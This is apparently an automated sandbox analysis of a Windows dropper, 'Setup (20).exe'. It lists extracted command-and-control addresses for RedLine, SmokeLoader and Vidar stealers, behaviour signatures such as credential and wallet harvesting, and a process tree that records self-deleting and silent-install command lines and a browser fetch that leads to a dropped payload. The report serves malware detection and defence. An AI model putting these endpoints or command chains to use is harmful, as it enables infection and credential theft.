Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    904s
  • max time network
    1647s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (20).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

redline

C2

205.185.119.191:18846

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 17 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • Blocklisted process makes network request 19 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 6 IoCs
  • Drops file in System32 directory 23 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 30 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 37 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 29 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 8 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 57 IoCs
  • Suspicious use of SetWindowsHookEx 43 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious behavior: SetClipboardViewer
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    PID:1220
    • C:\Users\Admin\AppData\Local\Temp\Setup (20).exe
      "C:\Users\Admin\AppData\Local\Temp\Setup (20).exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1660
      • C:\Users\Admin\Documents\SDDPRBtDm4KJKeRhHwktnCG_.exe
        "C:\Users\Admin\Documents\SDDPRBtDm4KJKeRhHwktnCG_.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of AdjustPrivilegeToken
        PID:972
      • C:\Users\Admin\Documents\gNSE8cjGhr3QZPTVK77Uty1o.exe
        "C:\Users\Admin\Documents\gNSE8cjGhr3QZPTVK77Uty1o.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1728
        • C:\Users\Admin\AppData\Roaming\3618611.exe
          "C:\Users\Admin\AppData\Roaming\3618611.exe"
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          PID:2616
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2616 -s 1748
            5⤵
            • Program crash
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            PID:2872
        • C:\Users\Admin\AppData\Roaming\5308226.exe
          "C:\Users\Admin\AppData\Roaming\5308226.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          PID:2756
          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
            5⤵
            • Executes dropped EXE
            PID:2500
      • C:\Users\Admin\Documents\otvFTy9g2bXURnHGsomPy4OH.exe
        "C:\Users\Admin\Documents\otvFTy9g2bXURnHGsomPy4OH.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:1836
        • C:\Users\Admin\Documents\otvFTy9g2bXURnHGsomPy4OH.exe
          C:\Users\Admin\Documents\otvFTy9g2bXURnHGsomPy4OH.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1364
      • C:\Users\Admin\Documents\rUbWA8tvwZXjojCGoIMusJLa.exe
        "C:\Users\Admin\Documents\rUbWA8tvwZXjojCGoIMusJLa.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1612
      • C:\Users\Admin\Documents\IZbrw88s5gbzFbG_zTgAHdbk.exe
        "C:\Users\Admin\Documents\IZbrw88s5gbzFbG_zTgAHdbk.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:1844
        • C:\Users\Admin\Documents\IZbrw88s5gbzFbG_zTgAHdbk.exe
          C:\Users\Admin\Documents\IZbrw88s5gbzFbG_zTgAHdbk.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1292
      • C:\Users\Admin\Documents\SIiUWPDUizM7SGCwpkksPMnm.exe
        "C:\Users\Admin\Documents\SIiUWPDUizM7SGCwpkksPMnm.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:936
      • C:\Users\Admin\Documents\xVSPr4izg4OVKu31JyF7RR00.exe
        "C:\Users\Admin\Documents\xVSPr4izg4OVKu31JyF7RR00.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of AdjustPrivilegeToken
        PID:344
      • C:\Users\Admin\Documents\W50uLhuXiTtqYstvfpuR6Pm7.exe
        "C:\Users\Admin\Documents\W50uLhuXiTtqYstvfpuR6Pm7.exe"
        3⤵
        • Executes dropped EXE
        PID:864
        • C:\Users\Admin\Documents\W50uLhuXiTtqYstvfpuR6Pm7.exe
          "C:\Users\Admin\Documents\W50uLhuXiTtqYstvfpuR6Pm7.exe" -q
          4⤵
          • Executes dropped EXE
          PID:2216
      • C:\Users\Admin\Documents\PURL300tR7gBfhLN7v9___kE.exe
        "C:\Users\Admin\Documents\PURL300tR7gBfhLN7v9___kE.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:1404
        • C:\Users\Admin\Documents\PURL300tR7gBfhLN7v9___kE.exe
          C:\Users\Admin\Documents\PURL300tR7gBfhLN7v9___kE.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1060
      • C:\Users\Admin\Documents\SiYZbRmIqKPLLi0aVf559OSP.exe
        "C:\Users\Admin\Documents\SiYZbRmIqKPLLi0aVf559OSP.exe"
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:1796
      • C:\Users\Admin\Documents\n_QdLhXYGf7r3fJjk5aiBdVy.exe
        "C:\Users\Admin\Documents\n_QdLhXYGf7r3fJjk5aiBdVy.exe"
        3⤵
        • Executes dropped EXE
        PID:1648
        • C:\Users\Admin\Documents\n_QdLhXYGf7r3fJjk5aiBdVy.exe
          "C:\Users\Admin\Documents\n_QdLhXYGf7r3fJjk5aiBdVy.exe"
          4⤵
          • Executes dropped EXE
          PID:2320
      • C:\Users\Admin\Documents\QlX3b00e7NmBqFIaiOT1TaoB.exe
        "C:\Users\Admin\Documents\QlX3b00e7NmBqFIaiOT1TaoB.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of AdjustPrivilegeToken
        PID:576
      • C:\Users\Admin\Documents\mJBsmVHonyscF2rVokVdvuBe.exe
        "C:\Users\Admin\Documents\mJBsmVHonyscF2rVokVdvuBe.exe"
        3⤵
        • Executes dropped EXE
        PID:1072
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1072 -s 900
          4⤵
          • Loads dropped DLL
          • Program crash
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:588
      • C:\Users\Admin\Documents\eL054_cfYGHmkDRGv6rfZOkb.exe
        "C:\Users\Admin\Documents\eL054_cfYGHmkDRGv6rfZOkb.exe"
        3⤵
        • Executes dropped EXE
        PID:2088
      • C:\Users\Admin\Documents\Lqghrx5PYnyTwBr8lZXNo4IY.exe
        "C:\Users\Admin\Documents\Lqghrx5PYnyTwBr8lZXNo4IY.exe"
        3⤵
        • Executes dropped EXE
        PID:2064
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /im "Lqghrx5PYnyTwBr8lZXNo4IY.exe" /f & erase "C:\Users\Admin\Documents\Lqghrx5PYnyTwBr8lZXNo4IY.exe" & exit
          4⤵
            PID:2728
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im "Lqghrx5PYnyTwBr8lZXNo4IY.exe" /f
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2364
        • C:\Users\Admin\Documents\6SgSBEetzIzVWRXWr27swK7T.exe
          "C:\Users\Admin\Documents\6SgSBEetzIzVWRXWr27swK7T.exe"
          3⤵
          • Executes dropped EXE
          PID:988
        • C:\Users\Admin\Documents\bJC_aUIv4L1bIGAkYguzoH_W.exe
          "C:\Users\Admin\Documents\bJC_aUIv4L1bIGAkYguzoH_W.exe"
          3⤵
          • Executes dropped EXE
          PID:1268
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c taskkill /im "bJC_aUIv4L1bIGAkYguzoH_W.exe" /f & erase "C:\Users\Admin\Documents\bJC_aUIv4L1bIGAkYguzoH_W.exe" & exit
            4⤵
              PID:2828
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /im "bJC_aUIv4L1bIGAkYguzoH_W.exe" /f
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2080
          • C:\Users\Admin\Documents\1Tnt1vX4ccFnqiu9G9wLCcWA.exe
            "C:\Users\Admin\Documents\1Tnt1vX4ccFnqiu9G9wLCcWA.exe"
            3⤵
            • Executes dropped EXE
            • Checks BIOS information in registry
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            PID:2164
          • C:\Users\Admin\Documents\Uvmrac1Zkov5MnTZDSbw1eSi.exe
            "C:\Users\Admin\Documents\Uvmrac1Zkov5MnTZDSbw1eSi.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2148
            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2956
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                5⤵
                • Executes dropped EXE
                PID:2424
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                5⤵
                • Executes dropped EXE
                PID:2056
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                5⤵
                  PID:3620
              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                4⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Modifies system certificate store
                • Suspicious use of AdjustPrivilegeToken
                PID:2432
              • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                4⤵
                • Executes dropped EXE
                PID:1392
            • C:\Users\Admin\Documents\rMZOi0QNSe2lvNjLG8gzwDqJ.exe
              "C:\Users\Admin\Documents\rMZOi0QNSe2lvNjLG8gzwDqJ.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2288
              • C:\Users\Admin\AppData\Local\Temp\is-KR9M0.tmp\rMZOi0QNSe2lvNjLG8gzwDqJ.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-KR9M0.tmp\rMZOi0QNSe2lvNjLG8gzwDqJ.tmp" /SL5="$3016E,138429,56832,C:\Users\Admin\Documents\rMZOi0QNSe2lvNjLG8gzwDqJ.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies system certificate store
                • Suspicious use of FindShellTrayWindow
                PID:2840
                • C:\Users\Admin\AppData\Local\Temp\is-CA7DR.tmp\Setup.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-CA7DR.tmp\Setup.exe" /Verysilent
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Program Files directory
                  PID:2296
                  • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                    "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                    6⤵
                    • Executes dropped EXE
                    • Checks processor information in registry
                    PID:2336
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /im LGCH2-401_2021-08-18_14-40.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe" & del C:\ProgramData\*.dll & exit
                      7⤵
                        PID:3940
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im LGCH2-401_2021-08-18_14-40.exe /f
                          8⤵
                          • Kills process with taskkill
                          PID:1356
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 6
                          8⤵
                          • Delays execution with timeout.exe
                          PID:4428
                    • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                      "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:1440
                      • C:\Users\Admin\AppData\Local\Temp\is-DI0CS.tmp\Inlog.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-DI0CS.tmp\Inlog.tmp" /SL5="$1027E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of FindShellTrayWindow
                        PID:3056
                    • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                      "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                      6⤵
                      • Executes dropped EXE
                      • Enumerates connected drives
                      • Modifies system certificate store
                      • Suspicious use of FindShellTrayWindow
                      PID:1268
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279850 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                        7⤵
                          PID:3468
                      • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                        "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:2192
                        • C:\Users\Admin\AppData\Local\Temp\is-6I6RB.tmp\WEATHER Manager.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-6I6RB.tmp\WEATHER Manager.tmp" /SL5="$102B6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of FindShellTrayWindow
                          PID:2816
                          • C:\Users\Admin\AppData\Local\Temp\is-NFDFO.tmp\Setup.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-NFDFO.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                            8⤵
                            • Enumerates connected drives
                            • Modifies system certificate store
                            • Suspicious use of FindShellTrayWindow
                            PID:4532
                            • C:\Windows\SysWOW64\msiexec.exe
                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-NFDFO.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-NFDFO.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279850 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                              9⤵
                                PID:3372
                        • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                          "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                          6⤵
                          • Executes dropped EXE
                          PID:572
                          • C:\Users\Admin\AppData\Local\Temp\is-EC9DE.tmp\VPN.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-EC9DE.tmp\VPN.tmp" /SL5="$102EE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                            7⤵
                            • Executes dropped EXE
                            • Suspicious use of FindShellTrayWindow
                            PID:2412
                            • C:\Users\Admin\AppData\Local\Temp\is-Q3LIG.tmp\Setup.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-Q3LIG.tmp\Setup.exe" /silent /subid=720
                              8⤵
                                PID:1552
                                • C:\Users\Admin\AppData\Local\Temp\is-V2T4H.tmp\Setup.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-V2T4H.tmp\Setup.tmp" /SL5="$306CA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-Q3LIG.tmp\Setup.exe" /silent /subid=720
                                  9⤵
                                  • Drops file in Program Files directory
                                  • Modifies system certificate store
                                  PID:3388
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                    10⤵
                                      PID:3972
                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                        tapinstall.exe remove tap0901
                                        11⤵
                                          PID:2184
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                        10⤵
                                          PID:3932
                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                            tapinstall.exe install OemVista.inf tap0901
                                            11⤵
                                            • Drops file in System32 directory
                                            • Drops file in Windows directory
                                            • Modifies system certificate store
                                            PID:2164
                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                          10⤵
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Modifies data under HKEY_USERS
                                          PID:2320
                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                          10⤵
                                            PID:3756
                                  • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                    "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:2688
                                  • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                    "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2748
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 1372
                                      7⤵
                                      • Program crash
                                      • Suspicious behavior: GetForegroundWindowSpam
                                      PID:1436
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      7⤵
                                        PID:1744
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im chrome.exe
                                          8⤵
                                          • Kills process with taskkill
                                          PID:3340
                                    • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                      "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:2380
                                      • C:\Users\Admin\AppData\Local\Temp\is-31GIO.tmp\MediaBurner2.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-31GIO.tmp\MediaBurner2.tmp" /SL5="$102FA,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:824
                                        • C:\Users\Admin\AppData\Local\Temp\is-PJMR2.tmp\3377047_logo_media.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-PJMR2.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                          8⤵
                                          • Drops file in Drivers directory
                                          • Adds Run key to start application
                                          • Drops file in Program Files directory
                                          PID:3632
                                          • C:\Program Files\7-Zip\FNPTMPGWFP\ultramediaburner.exe
                                            "C:\Program Files\7-Zip\FNPTMPGWFP\ultramediaburner.exe" /VERYSILENT
                                            9⤵
                                              PID:1868
                                              • C:\Users\Admin\AppData\Local\Temp\is-UKNKF.tmp\ultramediaburner.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-UKNKF.tmp\ultramediaburner.tmp" /SL5="$400CC,281924,62464,C:\Program Files\7-Zip\FNPTMPGWFP\ultramediaburner.exe" /VERYSILENT
                                                10⤵
                                                • Drops file in Program Files directory
                                                • Suspicious use of FindShellTrayWindow
                                                PID:4352
                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                  11⤵
                                                    PID:3464
                                              • C:\Users\Admin\AppData\Local\Temp\85-5b75c-fa0-3ce90-91effeaf09452\Jaeqaezhusuwa.exe
                                                "C:\Users\Admin\AppData\Local\Temp\85-5b75c-fa0-3ce90-91effeaf09452\Jaeqaezhusuwa.exe"
                                                9⤵
                                                  PID:3096
                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                    10⤵
                                                    • Modifies Internet Explorer settings
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:4848
                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4848 CREDAT:275457 /prefetch:2
                                                      11⤵
                                                      • Modifies Internet Explorer settings
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4476
                                                      • C:\Users\Admin\AppData\Local\Temp\259910176.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\259910176.exe"
                                                        12⤵
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:3108
                                                        • C:\Windows\system32\control.exe
                                                          C:\Windows\system32\control.exe -h
                                                          13⤵
                                                            PID:3296
                                                            • C:\Windows\system32\rundll32.exe
                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                                                              14⤵
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:4348
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4848 CREDAT:340994 /prefetch:2
                                                        11⤵
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2076
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4848 CREDAT:472076 /prefetch:2
                                                        11⤵
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:4240
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4848 CREDAT:996358 /prefetch:2
                                                        11⤵
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2960
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4848 CREDAT:275466 /prefetch:2
                                                        11⤵
